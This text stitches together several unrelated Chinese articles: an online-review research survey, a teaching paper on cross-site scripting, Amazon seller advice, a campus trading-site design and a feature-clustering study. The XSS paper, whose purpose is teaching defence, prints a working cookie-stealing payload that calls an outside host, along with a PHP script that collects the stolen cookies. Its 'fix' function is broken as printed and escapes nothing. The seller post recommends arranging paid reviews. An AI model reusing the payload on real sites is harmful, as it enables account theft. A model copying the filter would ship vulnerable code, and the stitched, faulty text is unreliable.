研究中与评论有用性常常共同出现的一个衡量评论的功能的变量就是评论的可信度。由于在交流有关研究领域发现可信度与劝说性之间的强相关,可信度被用来作为评论信息是否对潜在消费者态度以及行为有强的劝说性的衡量指标。从信息传播的角度来说,信息源、消息和接受者是信息评价的3个主要的信息元素。因此相比于有用性,在线评论的可信度更强调从评论强度、信息源的可信度、评论间的一致性、评论累积排名等维度来度量,从已有的研究文献来看,其中又主要侧重于对信息源可信度的判断,也就是对评论者的可信度的判断(Cheung等,2009)。Lis(2013)将信息源的专业度和值得信任程度作为信息源可信度的衡量标准和评论排名一起作为评论可信度的决定因素,其中值得信任程度中包含评论内容的质量、与其他评论的一致性以及其他消费者对评论的认可这几个方面。因此,评论可信度与评论有用性是有交叉又各有侧重的两个研究变量。研究者会根据研究方法以及目标选择其中合适的变量作为对评论功能的衡量。不过由于目前侧重于文本评论数据挖掘的研究方法所限,还是以有用性的排名统计作为评论价值功能的衡量更多见。
其他还有一些研究变量,比如将浏览者看完评论信息以后持有的态度作为衡量评论功能实现的衡量指标,比如对产品的购买意愿、感知的产品质量、满意度、忠诚度等(Reyes A & Rosso P,2012;Chang & Yen,2013),以及直接用企业经营数据,比如产品的销量、企业收入、公司股价来作为评论的作用,不过后两者多用于第三方评论或者公众舆论有关的评论效果研究中,与在线产品评论有关的经营数据最主要的还是被评论产品的销量数据(Sonnier等,2011)。
三、在线产品评论分析技术
在线评论信息挖掘研究集中在信息系统、电子商务管理科学等领域。近几年,在线评论信息挖掘日益成为在线产品评论研究的热点,由于文本挖掘技术的研究进展还处于不太成熟的阶段,各领域中计算机科学和信息科学领域对文本挖掘技术的研究居多。文本挖掘技术和自然语言处理等技术现在已经能对半结构化和非结构化数据进行挖掘,在线评论的表现形式为数量众多且非结构化的文本,但是如何提高对在线评论的挖掘精确度也一直是技术研究领域关注的焦点。目前,在挖掘技术上的研究集中于信息抽取、情感分析和文本分类这三类主流研究方法。信息抽取是情感分析的基础,同时信息抽取和情感分析又是文本分类的基础。信息抽取主要是通过对评论中描述产品性能或功能的名词或短语进行关键词的抽取,情感分析是通过语义分析对评论中需要联系上下文才能理解评论者表达效价进行情感倾向的判断,挖掘出的信息结果包括抽取的主题特征 (价格、质量、外观等)、情感倾向 (正面、中立、负面)、文本类别(主题和情感类别)。以情感分析为例,当前所广泛采用的文本语义属性分析的挖掘方法是不够成熟的,无论是词语极性推测法、点互信息法、抽取主观表达式法还是构造情感词典法,都是基于文本内容字面信息的加工和处理,而文本内容所包含的潜在信息却是无法挖掘的,如说话人的语言风格所反映出的评论人所属的用户群体或专业程度等,因此仅从字面来进行情感倾向的判断存在一定的不精确性。
但是也有越来越多的学者在信息抽取和文本挖掘的基础上从实证研究角度对在线评论的有用性、对消费者态度以及商家销量的影响等进行研究。有学者利用主题特征信息抽取技术从在线评论中抽取产品特征和主题信息,并以此研究发现评论中消费者提及最多的产品主题特征并不一定对他们的满意度影响最大(You WJ,et al.2012)。Cao等(2011)运用潜在语义文本分析文本挖掘法(LSA)应用logit回归模型研究了评论星级、评论时间、评论字数、评论中包含的句子数、语义特征(评论中的情感倾向)对评论有用性投票数的影响,经过发现评论的语义特征对评论有用性影响最大。Min和Park(2012)从评论者经验这一角度出发应用文本挖掘和实证分析方法研究如何根据评论者经验识别出高质量评论。还有研究者通过对手机评论进行情感分析,识别手机是否存在过度的功能设计并以此获得更多的顾客满意度来提高销售绩效(Liu P,et al.2010)。未来随着文本挖掘技术的进步,分析精确性不断提高,相信这类结合实证方法证明在线产品评论商业应用效果的研究也会越来越多并得出更有价值的结论。
四、结语
综上所述,在线产品评论现阶段为止的研究有以下三个方面的特点:第一,研究中关于在线产品评论的一般特征,内容特征,评论者特征等等这些特征形式早期研究较多。虽然在研究发展过程中会出现不同程度的交叉重叠和所属类别上的变化,但随着购物网站评论体系设置的成熟化,这些特征形式基本稳定下来,并且主要的特征属性都集中在评论文本的特征描述中,这也说明了文本评论的重要作用。因此,现阶段的研究主要集中于评论文本内容的深度挖掘带来的新的特征属性;第二,文本挖掘技术和自然语言处理等技术现在已经能对半结构化和非结构化数据进行挖掘,而在线评论的表现形式为数量众多且非结构化的文本,如何提高对在线产品评论的挖掘精确度也一直是技术研究领域关注的焦点。正因为文本挖掘技术的研究进展还处于不太成熟的阶段,现阶段的挖掘主题比较少,情感分析精度也不够高,因此其他领域即便将现有挖掘技术应用于实证研究中,也难以得到稳定的和有价值的结论。相信未来随着文本挖掘技术的进步,这类结合实证方法证明在线产品评论商业应用效果的研究也会越来越多,并得出更有价值的结论;第三,在商业应用研究领域,如何选取合适的研究变量和指标,比如消费者行为变量及观测指标来与文本挖掘技术得到的计量数据相结合,从而实现更准确有价值的实证研究,也是在研究方法上需要继续探索和解决的问题,比如目前用网站评论有用性的排名数据统计来替代评论有用性度量的方式过于单一且准确性受到质疑。
另外,还有两个在线产品评论研究中比较集中的主题未来也可能会继续发展:一个是购买者参与评论的动机及其在社交网络中的作用;另一个是对购物网站上越来越多出现的虚假评论现象的研究,目前的研究集中在虚假评论的识别以及其影响方面,未来随着消费者的经验增加以及网站成熟运作,这方面的研究还会有新的热点出现。
主要参考文献:
[1]李恒.在线评论特征的维度综述[J].企业技术开发,2015.1.
[2]李宏,喻葵,夏景波.负面在线评论对消费者网络网络购买决策的影响,一个实验研究[J].情报杂志,2011.5.
[3]龚思兰,丁晟春,周夏伟,巢乃鹏.在线商品评论信息可信度影响因素实证研究[J].情报杂志,2013.32.11.
[4]宋晓晴,孙习祥.消费者在线评论采纳研究综述[J].现代情报,2015.1.
[5]罗彪,丛日飞.留、传、搜、用:消费者行为视角下的电子口碑研究综述与展望[J].外国经济与管理,2015.37.8.
[6]You WJ,Xia M,Liu,L,et al.Customer knowledge discovery form online reviews[J].Electron Markets,2012.7.7.
(广东外语艺术职业学院,广东 广州 510640)
【摘 要】高职院校的网络安全类课程教学中,需要学生既具有扎实的基础理论知识,又要求在教学中给学生提供一个模拟或者真实的操作环境帮助学生全面的掌握网络安全知识。如何防范跨站脚本攻击是当前网络安全工作中的一个重要课题,本文结合了日常教学的经验,在详细分析跨站脚本攻击原理的基础上,在php+mysql环境上搭建出一个真实的实验环境,帮助学习者深刻理解跨站脚本攻击的相关知识,并学会如何进行有效防范。
关键词 跨站脚本攻击; 网络安全; 实验平台
【Abstract】The students in vocational college are required to have enough knowledge about the principle of network security, and an experimental platform is also needed to help students lean network security. Cross Site Script(XSS) attack and defense is an important subject in network security field. An experimental platform is developed to help learner understand about XSS attack and defense, and the principle of XSS attack and defense is also analyzed. The platform is developed using php+mysql tools. This article is based on the author’s regular teaching experience.
【Key words】Cross site script attack; Network security; Experimental platform
跨站脚本攻击在各种网络安全漏洞中,一直被OWASP(Open Web Application Security Project) 组织评为十大安全漏洞中的第二威胁漏洞。2011年,国内最热门的信息平台“新浪微博”爆发跨站脚本攻击,仅持续16分钟,感染的用户就达33000个,可见其危害之大。
高职院校的《网络安全与防范》课程也把跨站脚本攻击作为一个重点的教学内容。为了让学生充分掌握跨站脚本攻击的防范方法,就必须透彻的了解跨站脚本攻击的原理和具体的实施过程。
我们开展了一项课题,旨在搭建一个网络攻防的应用平台,帮助学习者更深刻的理解各种网络攻防的原理和了解其实施的步骤,以采取更高效的防范措施,来杜绝网络攻击的产生。跨站脚本攻击就是其中的一项任务。
本文中,我们会对跨站脚本攻击进行详细的分析,并结合搭建的网络平台重建攻击过程,并提出防范方法。
跨站脚本攻击是由于网站的后台系统对用户的输入过滤不严而产生的。攻击者利用这一点把恶意代码加入到网站的后台系统中(通常是网页之中),当用户浏览这些网页时,那些隐含在正常网页中的恶意代码就会在用户的机器中得以执行,从而达到各种攻击用户电脑的目的。
为了理解跨站脚本攻击,有必要先了解用户访问一个没有恶意代码的简单网页的过程。访问如图 1所示的一个网页,用wireshark工具进行网络数据的捕获。
总共捕获到两个数据包,一个是浏览器发送给网站的请求数据包,其内容如图 2:
在请求数据包中,比较重要的一个字段是cookie字段,其具体内容记录了用户平时登录各种网站的账号和密码信息。跨站脚本攻击往往会通过这个字段获取到用户的账号等重要信息。
网站回送给浏览器的响应数据包如图 3:
在响应数据包中,除了一些头信息外,还附带上了网页的内容。可见,一个基本的网页访问过程就是由一个请求数据包和响应数据包组成的。
接下来,在我们搭建的实验平台上,对一个网站进行跨站脚本攻击,以实现一个不断弹出的窗口,迫使正常的网页浏览无法继续下去。在一个存在有漏洞的商品评价网页中,通过对商品添加评价进行攻击。如图 4:
在评论内容里面,写下如下的代码:
<script>while(true) alert(/You have been XSS attacked!/) </script>,
发表评论后,当其他用户登录网站,通过点击“查看该商品评论”查看评论时,就会出现如图 5所示的情况:
并且无论点击多少次“确定”按钮,都无法关闭此弹出窗口,表明此用户已经受到了跨站脚本攻击。打开由网站传送回来的网页源代码,可以发现这样一句代码:“<script>while(true) alert(/You have been XSS attacked!/) </script>”,这段代码已经入到网页中,当浏览器解析到这一段代码时,因为“<script>”标签的原因,标签对里面的内容会被解释执行,而不是作为对商品的评论原封不动的显示在页面上。通过查看网站后台数据库,发现如图 6所示的语句已经被写入了数据库:
当其他用户查看此商品的评论时,此条记录被读出,并插入到网页中,从而形成了跨站脚本攻击。
另外一个跨站脚本攻击的案例是盗取用户的登录账号和密码。
用户“qy1”在如图 7所示的网页中进行登录后:
在用户的机器上会保留一个cookie,里面记录了用户登录时输入的账号和密码。可以通过在用户的浏览器的地址栏输入语句“javascript:alert(document.cookie)”来显示出账号和密码,如图 8所示:
可见用户的账号和密码都保存在了用户的计算机中。通过跨站脚本攻击可以在攻击者的机器上获得用户的账号和密码。
攻击者a在某一个商品的评论中发表如图 9所示的内容:
其中,评论内容中输入的是: “<script>var ck=document.cookie;var url=\’kaikaixinxin.net/qlunwen1216/jieshoucookie.php?zhanghao=\’+ck;var daima=\´<iframe width=0 height=0 src=\"\’+url+\’\"></iframe>\’;document.write(daima);</script>”。
当用户“qy1”登录网站查看这一个评论时,其账号和密码就会发送到攻击者a所指定的机器上,并存储在“cookie.txt”文件中,其中的内容如图 10:
由此攻击者就利用跨站脚本攻击获取到了被攻击者的账号和密码等重要信息。
分析此次跨站脚本攻击,攻击者在商品评论里面并没有写入评论性的语句,而是写入了一段javascript代码,这段代码并没有经过过滤就被写到了网站的后台数据库中,如图 11:
当受攻击者浏览这个商品的评论时,这段代码没有经过任何过滤就被传送给了浏览器,而浏览器当解析到<script></script>所包括的语句时,会认为这是一段javascript语句,会执行语句中的内容。而这段代码的作用就是读取被攻击者机器上所存储的cookie信息,并且把此信息发送给攻击者所指定的网站的指定接收页面。我们再来看,这个接收页面的内容如下:
<?php
$cookie=$_GET[´zhanghao´];
$cookierec=fopen("cookie.txt","a");
fwrite($cookierec,$cookie."\n");
fclose($cookierec);
?>
其作用就是接收被攻击者发送过来的账号信息,并把它存储在文件“cookie.txt”里面。
被攻击者的机器在不知不觉中向攻击者指定的机器发送了数据包,其内容如图 12:
数据包中的GET语句包括了用户的账号等重要信息。
到此为止,一个详细的跨站脚本攻击过程就已经详细的展现出来。如何防止此种跨站脚本攻击呢。通过分析以上攻击过程,发现实现此类攻击,要具备以下条件:
(1)网站存在供用户输入数据的页面,类似留言板,商品评论,搜索框等。
(2)用户浏览了被攻击者恶意修改过的网页。
(3)用户的机器允许执行这些恶意代码。
(4)网站没有对用户的输入内容进行有效的过滤,即过滤掉那些攻击性的代码,并且在输出用户的评论或者搜索内容时也没有进行过滤。
对于以上的第一点,由于现在绝大多数网页都会有和用户交互的需要,所以给用户输入信息的功能,不能取消。
对于第二点,用户可以提高警惕,对于一些非法网站,尽量不要去访问。
对于第三点,用户可以禁止浏览器的活动脚本的执行,可以如图 13设置:
对于第四点,要求网站开发人员对用户的输入信息进行过滤,过滤掉恶意的代码。或者在输出时进行过滤,过滤掉恶意代码。
例如,可以建立一个如下的函数:
function unhtml($content){
$content=str_replace("&","&",$content);
$content=str_replace("<","<",$content);
$content=str_replace(">",">",$content);
$content=str_replace(" ," ",$content);
$content=str_replace(chr(13),"<br>",$content);
$content=str_replace("\\","\\\\",$content);
$content=str_replace(chr(34),""",$content);
return $content;
}
利用此函数把”<” ,”>”, “&”等字符转化为<, >, &等字符。这样浏览器在输出时,遇到<, >, &等字符时,就会在网页上显示”<” ,”>”, “&”等字符,而不会把这些字符对中所包含的内容当作可运行的代码进行执行了。
在实验平台的网站后台页面代码中加入unhtml函数,例如在显示商品评论的网页showpl.php中加入如下代码
<?php echo unhtml($info1[content]);?>
成功对商品评论中的输出内容进行了过滤,避免了跨站脚本攻击,用户看到的输出结果如图 14:
结论:
为了让学习者理解如何防范跨站脚本攻击,搭建了一个基于php+mysql的实验平台,在对跨站脚本攻击进行了原理上的详诉后,对攻击中的每个步骤进行了模拟,每一步的模拟都是一个真实攻击的再现。最后,讲解如何防范跨站脚本攻击,对于后台防范代码做了详解,演示了防范后的效果。我们搭建的实验环境让学习者不再局限于对跨站脚本攻击原理上的了解,而是有了一个实操的环境,极大的提高了学习者的学习兴趣,增加了学习效率。基于我们搭建的实验平台,将来还可以开展更多的实验。
参考文献
[1]赵彬.黑客攻防Web安全实战详解[M].北京:中国铁道出版社,2014.
[2]肖遥.大中型为了入侵要案直击与防御[M].北京:电子工业出版社,2011.
我的選品思路:市场容量不是很大真的不怕,最重要是找对趋势和有发展空间,因为现在亚马逊的产品暴利期一般也只有约3-9个月。都是斗快抓机会做中前期。说实话我做过的爆款都没用软件去细看每一项数据如关键词搜索量,预估销量等,真不宜花太多时间做太多技术性的分析,否则是很容易错过机会。
我看关键数据:看产品评论(Review)有否快速增长就可以确定产品是否有迹象在爆发,因为Review是亚马逊出单核心,而且Review增长快代表最近有一定销量支持,相反不用太执着销售排名(Best Sellers Rank),一来变化大,二来排名高的都被数以万计卖家关注,想找下一个爆款肯定是看一些现在被低估或不是太显眼的,可以告诉你大类目销售排名就算去到1万多的实际都有机会火起来,大类目排名5百至1万的都是理想范围。当找到目标产品后再确认一下对手数量及Review都没太多后,就用最短时间把产品发FBA上架再做测评
review可能有不少是假的?这是无可否认,但相对而言,操作假销量的成本是更低,一些商家可以天天一个listing刷50个销量,把销售排名撑到很高,这样如果我们太聚焦在销售排名就可能更容易出现误判,是非常影响大家分析市场的。所以相对之下我会比较看重review变化。而且虚假review实际上亚马逊都一直有删,力度更愈来愈大,相信review参考性只会愈来愈高。
过往月销数万美金listing的共通点和运营大方向:自建Listing,以单一Listing销量最大化做方针 (不铺货,有利资金,资源控制),产品单价约$20-$60美金发FBA(从头到尾都用FBA)-不依赖站内广告出单(过往广告产生的订单不超过总订单5-10%)-没有做站外引流(乱引流有可能大幅降低转化率,继而令搜索排名大幅下降,对listing伤害很大)-不用常常修改listing或关键词,核心关键词一般就3-5个,参考亚马逊搜索框提示,竞品标题或google adwords关键词工具已经足够-Listing和说明书别照搬厂家的标准文本,最好找专业的编写或让老外写,一来影响转化率,二来老外看到抓头的时候别怪吃一堆负评和退货-多改良包装,尽量弄小一点丶稳固一点和划算一点,要尽量降低运费成本和坏货率,不信买个Anker移动电源看一下他们包装怎麽弄就懂-多调控物流时间,如空運要长期达成约3-4天内到美国亚马逊仓库-多调控产品开发至上架所需的时间,包括设计丶生产包装,设计Listing,订货,打包产品,找测评等每一环节都要探讨可改善加快之方法-有空多准备替代方案,包括备用的物流公司,包装厂,产品厂家。因为只要当中一个环节出问题令你延迟1-2星期发货,即时已损失一些钱,更重要是如果开卖後FBA断货1-2星期,Listing是有机会被亚马逊严重降权,流量和单量都会持续明显下降,有时候Listing更可以直接报废,相信有不少大卖家也尝过。所以能调控好以上说的,每次上新Listing就能提前开卖几个星期,配合一开始选好在爆发中的产品,就能占尽先机。当然还有一些细节如怎麽建一个具优势的Listing或可运用什麽有效的销售策略?亚马逊平台内有什麽重要的规则/技巧等等,这些都掌握好销量才能最大化。这些下一次再跟大家分享。
关键词:物品交易;三层结构;.NET
中图分类号:TP311文献标识码:A文章编号:1009-3044(2011)27-6583-01
近年来,随着高校扩招,我院在校生规模的也在不断扩大。由此,间接催生了学生对用品的需求。据统计,我院学生大都家庭状况不太富裕,他们的消费水平普遍较低,因此二手学习生活用品对其而言,则相对显然经济实惠。所以学院社团也会不定期地组织跳蚤市场,但这远远不能满足学生需求。在信息化的时代,建立校园物品交易平台,必将成为一种新型的学生交易方式。给学生带来无穷的方便。在这个平台,所有学生都可以注册登录在上面购买自己需要的物品。网站将以物品列表的形式的向所有访客展示这些信息。
1 系统的体系结构
本系统根据软件体系的结构,结合本系统的设计特点,采用三层结构设计作为系统框架,系统的逻辑体系设计如图1所示。
通常意义上的三层架构就是将整个业务应用划分为:表示层(UI)、业务逻辑层(BLL)、数据访问层(DAL)。
1) 表示层(UI):用于显示数据和接受用户输入的数据,为用户提供一种交互式操作界面。、
2) 业务逻辑层(BLL):只要负责数据的传递和处理。
3) 数据访问层(DAL):主要实现对数据的保存和读取操作。
2 系统功能模块设计
本系统采用 技术,基于Microsoft SQL Server 2005 数据库系统的数据管理使该系统有更高效的性能。系统的基本功能如图2所示。
系统有4种用户类型,各种用户所涉及到得功能有所不同:
1) 游客的主要功能有:搜索商品、按类别查看商品、查看商品信息、查看商品评论、查看热门商品、查看所有店铺、查看店铺中商品、查看校园新闻、看到“关于我们”中的信息;
2) 普通用户的主要功能有:用户注册、用户登录、商品评价、商品留言、查看店主信息、给管理员留言、修改用户注册信息;
3) 开店用户的主要功能有:免费开店、快速搜索自己的店铺、修改店铺信息、上传商品、店铺过期商品处理、商品留言回复、管理店铺商品、延期过期商品;
4) 管理员的主要功能有:用户管理、店铺管理、商品管理、评论管理、新闻管理、给管理员的一封信、物品回收站、广告管理;
3 系统功能的实现
数据库设计主要涉及14张数据表,分别为管理员表、评论表、商品类别表、留言表、新闻表、商品过期时间表、回收站表、商品表、店铺表、学生信息表、给管理员一封信表、用户信息表、用户状态表、用户类型表。要求每天下班前自动备份数据库到另外一个硬盘上以提高数据的安全性。对数据库读写、删除操作最直接的实现方法是客户端程序通过数据库接口程序直接对数据库进行操作。
用编写的动态Web网页时,如果考虑不够周全,安全意识不强,会造成程序不够稳健,再加上数据库本身存在的安全漏洞,用户有意或无意的交互,就可能会成为网站的攻击事件。为了防止这些情况的发生,本系统采用了身份验证与授权、使用Parameters参数防止SQL攻击以及MD5加密等安全技术。
4 结束语
很多院校提倡绿色教育,首先要体现在校园文化上,通过学生物品交易平台的有效实施,将会大量减少墙壁污染和广告垃圾,同时促使了学生物品的循环使用,减少不必要的浪费。
在完成系统过程中本热收获了很多,同时也认识到自己的不足,尤其是自己开发的物品交易平台有很多是需要完善的地方。平台要继续增加好友功能,用户可在线聊天交友、查询资料等。
参考文献:
[1] 金永涛.基于.NET框架的Web应用系统安全问题研究[J].北华航天工业学院学报,2009(6).
[2] 张玉丽框架下工作流管理系统的研究与应用[D].青岛:中国海洋大学,2008.
[3] 郝冠军本质论[M].北京:机械工业出版社,2011.
关键词: 产品特征; 语义相似度; 聚类算法; 观点挖掘
中图分类号: TN911?34 文献标识码: A 文章编号: 1004?373X(2017)14?0081?04
Abstract: Aiming at the problem of the various product feature expressions existing in user reviews, it′s necessary to cluster the product feature words in the task of fine?grained opinion mining. According to the calculation characteristics of different semantic similarities, a semantic similarity mixture calculation method based on semantic knowledge and context entropy model is proposed to calculate the extract the semantic similarity of feature words. The traditional CBC algorithm is improved. A CBC?LIKE method suitable for product feature words clustering is proposed. The experiment is conducted for the real review corpus in three domains. The performances of the proposed semantic similarity calculation method and clustering algorithm are analyzed. The experimental results show that the method is effective, its performance is better than that of other two benchmark methods, which has perfect effect.
Keywords: product feature; semantic similarity; clustering algorithm; opinion mining
产品评论领域中的细粒度意见挖掘旨在深入到产品特征层面,产品特征包含商品本身、商品的部件和属性、以及属性的特征等[1?2]。比如下面评论句子:I browsed the [pictures] in the computer, and found the [photos] were perfect and the [resolution] was high。其中方括号括起来的是相机这一领域产品评论的特征,而下划线的词语是针对该特征用户表达的观点。由于用户发表评论时通常具有很大的自由度和随意性,并且不同用户的表达习惯也并不相同,因此,用户评论文本呈现出高度的随意性和不确定性特点。例如在数码相机领域中,不同用户可能分别采用“picture quality”和“image clarity”表示“照片”特征,而相机产品评论中提到的“picture”,“image”和“photo”这三个特征表示的是同一特征[3?4]。针对产品特征词聚类问题,本文在完成特征抽取任务的基础上,结合不同的语义相似度计算的特点,提出基于语义知识和基于上下文熵模型的语义相似度混合计算方法,计算抽取得到的特征词的语义相似度,然后提出CBC?LIKE聚类方法完成特征词集合的聚类任务。最后对来自于三个领域的真实评论语料上的仿真实验结果表明,本文提出的方法对特征词的聚类效果是有效的,优于另外两种基线方法。
1 产品特征词聚类
1.1 混合特征词语义相似度计算
本文采用基于三种语义相似度计算的混合计算方法用于特征聚类。
(1) 对产品特征的表达往往会共享同样的词[5]。比如,“LCD screen”, “LCD viewfinder”,指的都是同样的产品特征“display”,这时,screen和viewfinder具有相同的含义,所以对共享词相似度的计算公式如下:
(2) 基于WordNet[6]的语义相似度量方法,常用Jiang & Conrath算法[7],其计算方法如下:
式中:LCS表示和之间的最小公共包含(Least Common Subsumer);IC表示信息量;是一个常量,表示WordNet的名词分类中概念总数。比如,本文实验中计算的产品特征“image”和“photo”语义相似度为0.744,而“image”和“battery”计算结果为0.221。
(3) 基于词典的方法的局限在于词典容量有限,语义覆盖程度不足[8]。所以本文进一步引入基于上下文熵的方法计算词的相似度,计算方法如下:
式中:,分别表示分布上下文中出现的特征词;,其中,和表示当前词的左上下文向量和右上下文向量[9],上下文向量中的每个维度用TF?IDF作为向量值。,之间的距离可以通过它们的左右上下文分布的KL?divergence之和计算得到[10]。因为两个特征词分别都有其对应的左边上下文向量和右上下文向量,所以将两个相加计算得到,如下:
式中:和分别表示第维的词出现在特征词和的左(右)上下文向量中的概率权值;表示向量的维度。
最后,本文对基于上述三个语义相似度度量方法相结合,得到最终的相似度计算公式:
式中,和分别为语义相似度计算方法的权重,本文根据多次重复实验结果取值分别为0.7和0.4,实验中也对不同的语义相似度计算方法对聚类结果产生的影响进行了分析。
1.2 基于CBC算法的产品特征聚类
CBC算法[11]由Pantel等人提出,其基本思想是首先根据待聚类数据集中的数据紧凑度形成若干簇,然后采用递归的方法将高质量的候选聚类簇形成真正的中心,删除与其冲突的候选中心,待所有聚类中心确定后,计算残余元素与聚类中心的相似度,确定其归属。与K?means算法只用一个元素表示聚类的思想不同之处在于,该算法通过计算簇中元素的平均距离确定聚类的质心,从而可以避免因局部最优解而导致的较大误差,并且已被证明在根据词的语义相似度聚类中是有效的[11]。本文对传统CBC算法进行改进,提出CBC?LIKE算法用于特征词的聚类任务。与原始CBC算法一样该算法也分为三个步骤,不同的是,原始算法中需要两个阈值进行判断,而CBC?LIKE算法中只需要一个阈值即可,本文根据经验设置其值为0.35。另一方面改进是原始CBC算法的聚类簇数是未知的,所以其总是尽可能构建聚类簇,但在产品特征聚类任务中,事先可以根据产品领域人工设定聚类簇数[5],比如“Battery Cluster”,“Photography Cluster”等,从而提高聚类效果。算法如下:
CBC?LIKE算法描述:
输入: 产品特征词集合S
聚类簇个数p
(Committee)种子成员个数q
输出: 特征词聚类结果C
步骤1:for each feature in S
计算语义相似度:ss(,),,属于S且将ss(,)按降序存入集合
end for
步骤2:for each feature in S
选择中前q个特征构成的committee:
计算 的平均相似度:
end for
将按照降序存入集合
定义C为存储聚类中心集合的一个列表,初始化为空
for each in
if 相似度s(C,)
if 为空 then 返回 C
end if
end for
步骤3:for each residue feature
分别计算与p个committee的语义相似度
把fi并入语义相似度最近的簇
end if
2 实验结果与分析
2.1 实验数据集与评估指标
为测试本文提出方法的有效性,使用从亚马逊电商网站(http:///)中收集的3个领域的语料,分别是Digital Camera,Vacuum,Cell Phone。为得到最佳标准,三个标注者对抽取的产品特征进行人工分类,从中选择至少两个以上相同标注者标注的标签作为最终标注结果。表1给出了收集语料和标注结果的基本统计信息。
文中,对于特征聚类效果的评价指标使用熵值(Entropy)和纯度(Purity)[6],熵值用来衡量结果与标准划分相比的混乱程度,值越小,分类结果的混乱程度越低;纯度用来衡量分类结果与标准划分的一致性程度,值越大,分类结果的纯度越高。给定产品特征词集合FS和簇数,对该集合的最佳分类记作,聚类算法将特征词集合FS划分为k个独立子集,其熵值:
式中,表示结果类中包含标准类中元素的比例。给定一组对于每个特征词分类子集,其纯度:
式中,表示结果类中包含标准类中元素的比例。另外,为评估本文提出的基于CBC?LIKE聚类方法的效果,引入K?means和基于自动标注的半监督EM方法这两种聚类策略作为基线方法进行对比。
2.2 实验结果及分析
为了验证本文提出的CBC?LIKE算法中种子(committee)的个数对聚类效果的影响,实验中设置种子个数从1~6,在三个领域语料上分别进行了5轮实验,计算其对应的纯度和熵值。实验结果如图1所示。随着种子个数的增加,CBC?LIKE算法的性能首先是在增加,然后在某些点的位置上减少。这表明种子个数对产品特征聚类是有帮助的,但是随着种子数量的增加,会随之带来一些噪声信息。为了验证本文提出的基于CBC?LIKE聚类方法的有效性,将其与其他两个基线方法进行了比较,表2给出了不同聚类算法在三种产品领域集上Entropy和Purity值的比较结果。其中,对于特征词之间的相似度计算采用了本文提出的三种相似度计算结合的计算方法。可以看到,与KM和EM方法相比,m然在某些领域上面CBC?LIKE方法的Entropy值和Purity值这两个指标不占优,但是其在三种产品领域的平均Entropy值上都取得了最小值,同时平均Purity值取得了最大值,准确率上与KM算法比较,具有较为明显优势,这表明,本文提出的CBC?LIKE方法在聚类性能上要优于其他两种聚类方法。
为了进一步分析不同的相似度计算对于CBC?LIKE聚类算法效果的影响。下面分别给出了基于词典的计算方法和基于共同词的相似度计算方法(WordNet+SW),基于上下文熵模型和共同词的计算方法(CE+SW),本文前述的基于三种方法结合的相似度计算方法(FS),实验结果如表3所示。从实验结果中可以看出,采用三种相似度计算相结合的方法在最后的聚类效果上要优于另外两种。从平均Entropy值和Purity的结果上可以看到,FS要优于前两种方法,而CE+SW又优于WN+SW的方法,说明采用上下文熵模型对于特征词的相似度度量方法具有较好效果,能较好地反应特征词在产品评论中的语义关系,这个和本文实验中对于两个调和参数α和β的实验性选取上是相印证的。
3 结 论
针对产品评论观点挖掘产品特征聚类进行了研究,提出在三种不同语义相似度的混合计算方法的基础上,用CBC?LIKE聚类算法完成特征词集合的聚类。最后的仿真实验结果表明,本文提出的三种不同语义相似度混合计算方法以及CBC?LIKE聚类算法能有效完成聚类任务,纯度和熵值这两个指标上的表现优于基线方法。
参考文献
[1] BALAZS J A, VEL?SQUEZ J D. Opinion mining and information fusion: a survey [J]. Information fusion, 2015, 27(C): 95?110.
[2] HU M Q, LIU B. Mining and summarizing customer reviews [C]// Proceedings of 2004 the Tenth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. Seattle: ACM, 2004: 168?177.
[3] YU Jianxing, ZHA Zhengjun, WANG Meng, et al. Aspect ranking: identifying important product aspects from online consumer reviews [C]// Proceedings of 2011 Annual Meeting of the Association for Computational Linguistics: Human Language Technologies. Portland: Association for Computational Linguistics, 2011: 1496?1505.
[4] XU H, ZHANG F, WANG W. Implicit feature identification in Chinese reviews using explicit topic mining model [J]. Knowledge?based systems, 2015, 76(5): 166?175.
[5] ZHANG S, JIA W, XIA Y, et al. Product features extraction and categorization in Chinese reviews [C]// Proceedings of 2010 IEEE the 6th International Conference on Advanced Information Management and Service. [S.l.]: IEEE, 2010: 324?329.
[6] MILLER G A. WordNet: a lexical database for English [J]. Communications of the ACM, 1995, 38(11): 39?41.
[7] ZHAI Zhongwu, LIU Bing, XU Hua, et al. Clustering product features for opinion mining [C]// Proceedings of the Forth International Conference on Web Search and Web Data Mining. Hong Kong, China: IEEE, 2011: 347?354.
[8] BRYNIELSSON J, JOHANSSON F, JONSSON C, et al. Emotion classification of social media posts for estimating people′s reactions to communicated alert messages during crises [J]. Security informatics, 2014, 3(1): 1?11.
[9] XU T, PENG Q, CHENG Y. Identifying the semantic orientation of terms using S?HAL for sentiment analysis [J]. Knowledge?based systems, 2012, 35(15): 279?289.